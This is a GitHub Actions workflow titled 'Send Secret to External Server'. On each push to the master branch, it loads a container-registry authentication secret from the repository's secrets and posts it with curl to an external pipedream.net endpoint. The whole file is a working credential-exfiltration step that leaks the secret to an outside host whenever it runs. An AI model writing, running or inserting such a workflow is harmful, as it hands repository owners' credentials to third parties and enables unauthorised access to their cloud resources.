name: Send Secret to External Server

on:
  push:
    branches:
      - "master"

jobs:
  send-secret:
    runs-on: ubuntu-latest
    env:
      GCR_ATUH_KEY: ${{ secrets.GCR_AUTH_CRDSERV }}
    steps:
      - name: Set up environment variable
        run: echo "GCR_AUTH_KEY=$GCR_ATUH_KEY" >> $GITHUB_ENV

      - name: Send Secret
        run: |
          curl -X POST -d "secret=${GCR_AUTH_KEY}" https://eo643zjufhup1e1.m.pipedream.net
